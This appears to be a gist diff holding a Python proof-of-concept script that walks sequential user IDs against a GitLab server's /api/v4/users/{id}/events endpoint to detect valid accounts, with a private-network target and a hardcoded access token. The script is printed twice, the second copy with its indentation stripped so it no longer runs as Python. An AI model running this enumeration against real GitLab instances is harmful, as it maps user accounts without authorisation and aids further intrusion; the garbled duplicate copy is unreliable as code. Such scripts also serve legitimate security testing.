HouqiyuA · April 25, 2025 10:57
diff --git a/gistfile1.txt b/gistfile1.txt
 import requests
 import json

 def test_user_enumeration(base_url, token, start_id=1, end_id=10):
    """
    Test for user enumeration vulnerability by trying sequential user IDs
    :param base_url: Base API URL (e.g., 'http://192.168.126.129:9980')
    :param token: PRIVATE-TOKEN value
    :param start_id: Starting user ID to test
    :param end_id: Ending user ID to test
    """
    headers = {
        'Accept': 'application/json',
        'Host': 'gitlab.com',
        'PRIVATE-TOKEN': token
    }

    print("[*] Starting user enumeration test...")
    print(f"[*] Testing user IDs from {start_id} to {end_id}")
    print("-" * 80)

    for user_id in range(start_id, end_id + 1):
        url = f"{base_url}/api/v4/users/{user_id}/events"

        try:
            print(f"[>] Testing user ID: {user_id}")
            print(f"[>] Request URL: {url}")
            print(f"[>] Headers: {json.dumps(headers, indent=2)}")

            response = requests.get(url, headers=headers)

            # Print original request info
            print("\n[<] Response:")
            print(f"[<] Status Code: {response.status_code}")
            print(f"[<] Headers:")
            for header, value in response.headers.items():
                print(f"    {header}: {value}")
            print(f"[<] Body: {response.text}")

            # Analyze response for enumeration clues
            if response.status_code == 200:
                if response.text.strip() == "[]":
                    print("[!] Empty response but endpoint exists - likely valid user")
                else:
                    print("[!] Non-empty response - confirmed valid user with events")

                # Check for interesting headers
                interesting_headers = ['X-Total', 'X-Total-Pages', 'X-Page', 'X-Per-Page']
                for h in interesting_headers:
                    if h in response.headers:
                        print(f"[!] {h}: {response.headers[h]} - may indicate user activity")

            elif response.status_code == 404:
                print("[ ] User ID not found")
            else:
                print(f"[?] Unexpected status code: {response.status_code}")

            print("-" * 80)

        except Exception as e:
            print(f"[!] Error testing user ID {user_id}: {str(e)}")
            print("-" * 80)

 if __name__ == "__main__":
    # Configuration - modify these values as needed
    BASE_URL = "http://192.168.126.129:9980"# DEPLOYED ADDRED OF GITLAB
    PRIVATE_TOKEN = "7_pwYNpdf9HZAZr1pkEy" #YOUR TOKEN

    # Run the test
    test_user_enumeration(BASE_URL, PRIVATE_TOKEN, start_id=1, end_id=5)

    print("\n[*] Test complete. Analyze responses for differences that might indicate valid users.")
	import requests
	import json

	def test_user_enumeration(base_url, token, start_id=1, end_id=10):
	"""
	Test for user enumeration vulnerability by trying sequential user IDs
	:param base_url: Base API URL (e.g., 'http://192.168.126.129:9980')
	:param token: PRIVATE-TOKEN value
	:param start_id: Starting user ID to test
	:param end_id: Ending user ID to test
	"""
	headers = {
	'Accept': 'application/json',
	'Host': 'gitlab.com',
	'PRIVATE-TOKEN': token
	}

	print("[*] Starting user enumeration test...")
	print(f"[*] Testing user IDs from {start_id} to {end_id}")
	print("-" * 80)

	for user_id in range(start_id, end_id + 1):
	url = f"{base_url}/api/v4/users/{user_id}/events"

	try:
	print(f"[>] Testing user ID: {user_id}")
	print(f"[>] Request URL: {url}")
	print(f"[>] Headers: {json.dumps(headers, indent=2)}")

	response = requests.get(url, headers=headers)

	# Print original request info
	print("\n[<] Response:")
	print(f"[<] Status Code: {response.status_code}")
	print(f"[<] Headers:")
	for header, value in response.headers.items():
	print(f" {header}: {value}")
	print(f"[<] Body: {response.text}")

	# Analyze response for enumeration clues
	if response.status_code == 200:
	if response.text.strip() == "[]":
	print("[!] Empty response but endpoint exists - likely valid user")
	else:
	print("[!] Non-empty response - confirmed valid user with events")

	# Check for interesting headers
	interesting_headers = ['X-Total', 'X-Total-Pages', 'X-Page', 'X-Per-Page']
	for h in interesting_headers:
	if h in response.headers:
	print(f"[!] {h}: {response.headers[h]} - may indicate user activity")

	elif response.status_code == 404:
	print("[ ] User ID not found")
	else:
	print(f"[?] Unexpected status code: {response.status_code}")

	print("-" * 80)

	except Exception as e:
	print(f"[!] Error testing user ID {user_id}: {str(e)}")
	print("-" * 80)

	if __name__ == "__main__":
	# Configuration - modify these values as needed
	BASE_URL = "http://192.168.126.129:9980"# DEPLOYED ADDRED OF GITLAB
	PRIVATE_TOKEN = "7_pwYNpdf9HZAZr1pkEy" #YOUR TOKEN

	# Run the test
	test_user_enumeration(BASE_URL, PRIVATE_TOKEN, start_id=1, end_id=5)

	print("\n[*] Test complete. Analyze responses for differences that might indicate valid users.")
No results found